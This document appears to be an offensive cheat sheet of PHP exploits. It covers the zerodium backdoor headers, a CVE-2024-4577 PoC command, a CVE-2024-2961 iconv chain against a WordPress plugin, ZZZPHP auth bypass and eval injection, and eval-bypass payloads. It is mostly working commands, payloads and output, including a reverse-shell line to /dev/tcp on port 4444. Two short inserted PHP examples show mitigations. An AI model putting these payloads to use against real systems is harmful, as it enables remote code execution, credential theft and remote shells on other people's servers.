PHP
PHP 8.1.0-dev
Try RCE & SQLi
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');

PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
python watchTowr-vs-php_cve-2024-4577.py -c "<?php system('calc');?>" -t http://192.168.253.132/test.sina
Iconv
LFI
For buddyforms 2.7.7
# python lfi.py
Remote File Read - CVE-2024-2961
Enter the path of the file you want to read (e.g., /etc/passwd): ../wp-config.php
Enter a numeric ID for the upload (e.g., 1): 1
File uploaded successfully: http://host.htb/wp-content/uploads/2025/01/1-17.png
GIF89a\nM<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/documentation/article/editing-wp-config-php/
*
* @package WordPress
*/
<-SNIP->
RCE
Find the libc.so path on the target machine
# curl 'http://host.htb/wp-admin/admin-ajax.php' -H "Content-Type: application/x-www-form-urlencoded" -d 'action=upload_image_from_url&id=1&accepted_files=image/gif&url=php://filter/convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode/resource=/proc/self/maps' -v
<-SNIP->
{"status":"OK","response":"http:\/\/host.htb\/wp-content\/uploads\/2025\/01\/1-21.png","attachment_id":191}#
# curl http://host.htb/wp-content/uploads/2025/01/1-21.png | grep libc.so
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
7f29c1467000-7f29c148d000 r--p 00000000 00:3b 292782 /usr/lib/x86_64-linux-gnu/libc.so.6
7f29c148d000-7f29c15e2000 r-xp 00026000 00:3b 292782 /usr/lib/x86_64-linux-gnu/libc.so.6
7f29c15e2000-7f29c1635000 r--p 0017b000 00:3b 292782 /usr/lib/x86_64-linux-gnu/libc.so.6
7f29c1635000-7f29c1639000 r--p 001ce000 00:3b 292782 /usr/lib/x86_64-linux-gnu/libc.so.6
7f29c1639000-7f29c163b000 rw-p 001d2000 00:3b 292782 /usr/lib/x86_64-linux-gnu/libc.so.6
100 72048 100 72048 0 0 169k 0 --:--:-- --:--:-- --:--:-- 169k
Download libc.so
# curl 'http://host.htb/wp-admin/admin-ajax.php' -H "Content-Type: application/x-www-form-urlencoded" -d 'action=upload_image_from_url&id=1&accepted_files=image/gif&url=php://filter/convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode/resource=/usr/lib/x86_64-linux-gnu/libc.so.6' -v
* Trying 10.10.11.52:80...
* Connected to host.htb (10.10.11.52) port 80 (#0)
> POST /wp-admin/admin-ajax.php HTTP/1.1
> Host: host.htb
> User-Agent: curl/7.88.1
> Accept: */*
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 2069
>
< HTTP/1.1 200 OK
< Date: Tue, 28 Jan 2025 08:41:14 GMT
< Server: Apache/2.4.62 (Debian)
< X-Powered-By: PHP/8.3.2
< X-Robots-Tag: noindex
< X-Content-Type-Options: nosniff
< Expires: Wed, 11 Jan 1984 05:00:00 GMT
< Cache-Control: no-cache, must-revalidate, max-age=0
< Referrer-Policy: strict-origin-when-cross-origin
< X-Frame-Options: SAMEORIGIN
< Vary: Accept-Encoding
< Content-Length: 115
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host host.htb left intact
{"status":"OK","response":"http:\/\/host.htb\/wp-content\/uploads\/2025\/01\/1-22.png","attachment_id":191}#
# wget http://host.htb/wp-content/uploads/2025/01/1-22.png
Clean and add missing headers:
1 - On your host, find the starting offset of the section headers in a libc.so of the same version as the one on the victim (here libc.so.6)
# readelf -S /lib/x86_64-linux-gnu/libc.so.6
There are 64 section headers, starting at offset 0x1d4458:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
<-SNIP->
Here the starting offset is 0x1d4458
2 - Extract libc.so from png file
# cat cleanPngToElf.py
def extract_libc(png_path, output_path, start_offset, total_size):
    """
    Extract the libc.so.6 bytes from the downloaded PNG file.
    """
    with open(png_path, 'rb') as png_file:
        # Skip the prefix the upload added, then read exactly the bytes
        # that belong to libc.so.6
        png_file.seek(start_offset)
        extracted_data = png_file.read(total_size)
    with open(output_path, 'wb') as output_file:
        output_file.write(extracted_data)
    print(f"Extracted libc.so.6 data to {output_path}")
    print(f"Extracted size: {len(extracted_data)} bytes")


def append_valid_section_headers(libc_path, reference_libc_path,
                                 section_headers_offset, total_section_headers_size):
    """
    Append valid section headers from a reference libc.so.6 to the extracted file.
    """
    with open(reference_libc_path, 'rb') as ref_file:
        ref_file.seek(section_headers_offset)
        section_headers_data = ref_file.read(total_section_headers_size)
    with open(libc_path, 'ab') as libc_file:
        libc_file.write(section_headers_data)
    print("Appended section headers from reference libc.so.6.")


# Paths to files
png_file_path = '1-22.png'
reference_libc_path = '/lib/x86_64-linux-gnu/libc.so.6'
output_libc_path = 'libc.so.7'

# Known offsets and sizes
elf_start_offset = 9  # ELF header start offset inside the downloaded png
section_headers_offset = 0x1D4458  # Section headers offset in reference libc.so.6 (from readelf -S)
total_section_headers_size = 60 * 64  # 60 section headers, each 64 bytes
total_size = section_headers_offset + total_section_headers_size - elf_start_offset  # Full size of libc.so.6

# Step 1: Extract the main ELF data from the png file
extract_libc(
    png_path=png_file_path,
    output_path=output_libc_path,
    start_offset=elf_start_offset,
    total_size=total_size,
)

# Step 2: Append section headers from the reference libc.so.6
append_valid_section_headers(
    libc_path=output_libc_path,
    reference_libc_path=reference_libc_path,
    section_headers_offset=section_headers_offset,
    total_section_headers_size=total_section_headers_size,
)
print(f"Fixed libc.so.6 saved to: {output_libc_path}")
# python cleanPngToElf.py
Extracted libc.so.6 data to libc.so.7
Extracted size: 1921871 bytes
Appended section headers from reference libc.so.6.
Fixed libc.so.6 saved to: libc.so.7
# file libc.so.7
libc.so.7: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=82ce4e6e4ef08fa58a3535f7437bd3e592db5ac0, for GNU/Linux 3.2.0, stripped
Exploit
Put the cleaned libc.so into LIBC_FILE
# python3 exploit.py 'http://host.htb/wp-admin/admin-ajax.php' 'bash -c "bash -i >& /dev/tcp/10.10.X.X/4444 0>&1"'
Extract
extract() allows request data to redefine variables that the code assigned before extract() was called.
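An added example (not code from the original page) showing the overwrite with a constructed request array, then two ways to close it; the function and variable names are made up for illustration:

```php
<?php
declare(strict_types=1);

// Added example, not code from the original page. All names and the sample
// request array are constructed for illustration.

// Vulnerable: extract() defaults to EXTR_OVERWRITE, so a request key named
// "isAdmin" silently replaces the value the code assigned just above it.
function vulnerable_lookup(array $request): string
{
    $isAdmin = false;
    $username = 'guest';
    extract($request);
    return $isAdmin ? "admin panel for $username" : "public page for $username";
}

// Mitigation 1: EXTR_SKIP never overwrites a variable that already exists in
// scope, so $isAdmin (and here $username too) keep the values the code assigned.
function skip_lookup(array $request): string
{
    $isAdmin = false;
    $username = 'guest';
    extract($request, EXTR_SKIP);
    return $isAdmin ? "admin panel for $username" : "public page for $username";
}

// Mitigation 2 (preferred): never turn request keys into variable names;
// read the fields you expect by name so security flags stay out of reach.
function explicit_lookup(array $request): string
{
    $isAdmin = false;
    $username = isset($request['username']) ? (string) $request['username'] : 'guest';
    return $isAdmin ? "admin panel for $username" : "public page for $username";
}

// Constructed request, as produced by ?username=bob&isAdmin=1
$request = ['username' => 'bob', 'isAdmin' => '1'];

echo vulnerable_lookup($request), PHP_EOL;
echo skip_lookup($request), PHP_EOL;
echo explicit_lookup($request), PHP_EOL;
```

Only the first function takes the admin branch; the other two ignore the injected isAdmin key.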
ZZZPHP
ISSESSION adminid Authentication Bypass
curl -i -X GET "http://$TARGET_HOST/admin871/?index" \
-H "Cookie: zzz_adminid=1"
curl -b "PHPSESSID=abcdef123456; zzz_adminid=1" http://target.com/admin.php
parserIfLabel eval PHP Code Injection
curl -X POST "http://$TARGET_HOST/admin871/save.php?act=editfile" \
-H "Cookie: zzz_adminid=1" \
-d "file=/template/pc/cn2016/html/search.html&filetext={if:phpinfo()}{end if}"
This command sends a POST request to edit search.html, injecting the PHP code phpinfo() into it.
After injecting the PHP code, accessing the search.html page or triggering its rendering will execute the injected code.
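As an added defensive check (not ZZZPHP's own code), a scan that flags {if:...} labels whose condition is anything other than a plain comparison of template fields, the shape the injected label above takes; the sample template text, the assumed legitimate label syntax [field:count]>0 and the function names are constructed:

```php
<?php
declare(strict_types=1);

// Added example, not ZZZPHP's own code. Flags {if:...} template labels whose
// condition looks like a call, backtick, variable variable or include rather
// than a comparison of template fields. Sample template text is constructed.

function find_suspicious_if_labels(string $template): array
{
    $hits = [];
    if (!preg_match_all('/\{if:(.*?)\}/s', $template, $m, PREG_OFFSET_CAPTURE)) {
        return $hits;
    }
    foreach ($m[1] as [$condition, $offset]) {
        // identifier followed by "(" is a call; the rest are other eval tricks
        if (preg_match('/[A-Za-z_]\w*\s*\(|`|\$\$|\b(?:include|require)(?:_once)?\b/i', $condition)) {
            $hits[] = ['offset' => $offset, 'condition' => trim($condition)];
        }
    }
    return $hits;
}

// Walk a template directory and report every file with a suspicious label,
// e.g. scan_template_dir('/template/pc/cn2016/html')
function scan_template_dir(string $dir): array
{
    $report = [];
    foreach (glob(rtrim($dir, '/') . '/*.html') ?: [] as $path) {
        $hits = find_suspicious_if_labels((string) file_get_contents($path));
        if ($hits !== []) {
            $report[$path] = $hits;
        }
    }
    return $report;
}

// Constructed template: one legitimate label (assumed syntax), one injected label.
$template = "<h1>Search</h1>\n"
    . "{if:[field:count]>0}<p>results</p>{end if}\n"
    . "{if:phpinfo()}{end if}\n";

foreach (find_suspicious_if_labels($template) as $hit) {
    printf("suspicious {if:} label at byte %d: %s\n", $hit['offset'], $hit['condition']);
}
```

Running it on a copy of the template directory after the incident gives a quick list of files to restore from a known-good source.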
Ev1l eva1 bypass
curl -X POST "http://victime.com/vuln.php" \
-d "user_input=assert&server_input=<?php phpinfo(); ?>&cookie_input=<?php system('whoami'); ?>" \
-H "Cookie: session=<?php phpinfo(); ?>" \
-H "X-Custom-Header: <?php system('ls'); ?>"
curl -X POST "http://victime.com/vuln.php" \
-d "user_input=assert('phpinfo();')" \
-H "Cookie: session=assert('phpinfo();')" \
-H "X-Custom-Header: assert('phpinfo();')"
XXE in PHP
Pearcmd - LFI to RCE